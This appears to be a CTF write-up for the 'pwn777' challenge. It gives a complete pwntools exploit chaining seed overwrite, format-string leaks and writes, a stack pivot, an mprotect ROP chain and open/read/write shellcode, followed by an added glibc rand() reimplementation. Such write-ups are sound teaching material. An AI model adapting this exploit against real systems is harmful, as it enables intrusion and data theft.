The freshman competition at Chengdu University of Information Technology was a bit disappointing: the pwn challenges were trivially easy, and only one of them, pwn777, was at all interesting.
Attachment download: https://pan.baidu.com/s/1mEDAOE3Pz-x0oH4-eTcR-Q
Extraction code: 3pte
Overall approach:
A stack overflow overwrites the random seed, after which the "random" numbers become predictable and the check can be passed. A format string bug then leaks a batch of addresses. Because a sandbox is enabled that disallows execve, one_gadget and system are both unusable, so the plan is to call mprotect to change page permissions and then run open/read/write (ORW) shellcode directly to read the flag.
Note that the format string vulnerability operates on a buffer in the bss segment. By finding a pointer chain on the stack to work through, the address that needs modifying is eventually placed on the stack; the same technique is then used to modify the saved rbp and the return address, pivoting the stack into the bss segment, where the shellcode is executed.
The reference exploit is as follows:
from pwn import *
context(os = "linux", arch = "amd64", log_level = "debug")
io = remote("47.242.20.238", 7777)
# First ten glibc rand() outputs once the seed has been forced to 0 (glibc treats seed 0 as 1).
nums = [1804289383, 846930886, 1681692777, 1714636915, 1957747793, 424238335, 719885386, 1649760492, 596516649, 1189641421]
libc = ELF("./libc-2.23.so")
elf = ELF('./pwn')
# Stack overflow in the name buffer: 24 bytes of padding, then overwrite the seed with 0.
io.recvuntil("name\n")
payload = b'a'*24 + p32(0)
io.send(payload)
# Answer the ten "random" number prompts with the now-predictable sequence.
for i in range(10):
    io.recvuntil("number:")
    io.sendline(str(nums[i]).encode())
# Format string leak: __libc_start_main return address, a stack pointer, and a PIE address.
io.recvuntil("best!\n")
io.sendline(b'%13$p%6$p%11$p')
libc_addr = int(io.recv(14)[2:14], 16)
base1 = libc_addr - 240 - libc.sym["__libc_start_main"]
log.info('LIBC:\t' + hex(base1))
mprotect_addr = base1 + libc.sym["mprotect"]
log.info('mprotect_addr:\t' + hex(mprotect_addr))
addr = int(io.recv(14)[10:14], 16)   # low 16 bits of the leaked stack address
main_addr = int(io.recv(14)[2:14], 16)
base2 = main_addr - 0x16a8
log.info('PIE:\t' + hex(base2))
log.info('BSS:\t' + hex(elf.bss()))
bss_addr = base2 + 0x4060 + 16 - 8
leave_addr = base2 + 0x1676
log.info('bss_addr:\t' + hex(bss_addr))
log.info('leave_addr:\t' + hex(leave_addr))
# Use the stack pointer chain to point slot 10 at the return address, then patch its low byte to a leave;ret.
val = addr + 8
payload = flat("%" + str(val) + "c%6$hn")
io.sendline(payload)
payload = flat("%" + str((leave_addr & 0xFF)) + "c%10$hhn")
io.sendline(payload)
# Rewrite the saved rbp two bytes at a time so that leave;ret pivots onto bss.
val = addr
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str(bss_addr & 0xFFFF) + "c%41$hn")
io.sendline(payload)
val = addr + 2
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str((bss_addr >> 16) & 0xFFFF) + "c%41$hn")
io.sendline(payload)
val = addr + 4
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str((bss_addr >> 32) & 0xFFFF) + "c%41$hn")
io.sendline(payload)
# open("./flag") / read(fd, rsp, 0x100) / write(1, rsp, 0x100): no execve, so the sandbox allows it.
shellcode='''
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
mov rax, 2
mov rdi, 0x67616c662f2e
push rdi
mov rdi, rsp
syscall
mov rdx, 0x100
mov rsi, rdi
mov rdi, rax
mov rax, 0
syscall
mov rdi, 1
mov rax, 1
syscall
'''
pop_rdi_ret = base1 + 0x21112
pop_rsi_ret = base1 + 0x202f8
pop_rdx_ret = base1 + 0x1b92
# ROP chain placed on bss: mprotect(page, 0x1000, RWX), then return into the shellcode that follows.
payload = b'jiaraniloveyou~\x00'
payload += p64(pop_rdi_ret)
payload += p64(bss_addr & 0xFFFFFFFFFFFFF000)
payload += p64(pop_rsi_ret)
payload += p64(0x1000)
payload += p64(pop_rdx_ret)
payload += p64(7)
payload += p64(mprotect_addr)
payload += p64(bss_addr + len(payload))
payload += asm(shellcode)
io.sendline(payload)
io.interactive()
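The hardcoded nums list above is nothing more than the first ten values glibc's rand() returns after srand(0) (glibc replaces a seed of 0 with 1), which is why forcing the seed makes the "random" check deterministic and why rand() must never guard anything security-relevant. The following Python, added here and not part of the original writeup, reimplements glibc's default TYPE_3 generator so the sequence can be reproduced offline; the function names are my own.

```python
# Pure-Python reimplementation of glibc's default rand()/random() generator
# (TYPE_3: 31-word additive feedback state, 310 warm-up outputs discarded).
# Added example, not code from the original writeup.

MOD31 = 2147483647  # 2**31 - 1, modulus of the seeding LCG


def glibc_rand_sequence(seed, count):
    """Return the first `count` values glibc rand() yields after srand(seed).

    Assumes 0 <= seed < 2**31, which covers the seed the exploit forces.
    """
    # glibc's srandom_r silently maps seed 0 to 1, so srand(0) == srand(1).
    if seed == 0:
        seed = 1
    state = [0] * (344 + count)
    # Fill the 31-word state with a 16807-multiplier LCG modulo 2**31 - 1.
    state[0] = seed
    for i in range(1, 31):
        state[i] = (16807 * state[i - 1]) % MOD31
    # Additive feedback: r[i] = r[i-31] + r[i-3] on 32-bit words.
    for i in range(31, 34):
        state[i] = state[i - 31]
    out = []
    for i in range(34, 344 + count):
        state[i] = (state[i - 31] + state[i - 3]) & 0xFFFFFFFF
        if i >= 344:             # the first 310 results are discarded
            out.append(state[i] >> 1)  # rand() returns the top 31 bits
    return out


# Constructed reference: the values the exploit hardcodes for seed 0/1.
EXPECTED = [1804289383, 846930886, 1681692777, 1714636915, 1957747793,
            424238335, 719885386, 1649760492, 596516649, 1189641421]


def seed_is_predictable(seed, observed):
    """True if `observed` is exactly what rand() emits after srand(seed)."""
    return glibc_rand_sequence(seed, len(observed)) == list(observed)


if __name__ == "__main__":
    print(glibc_rand_sequence(0, 10))
    print("matches the exploit's list:", seed_is_predictable(0, EXPECTED))
```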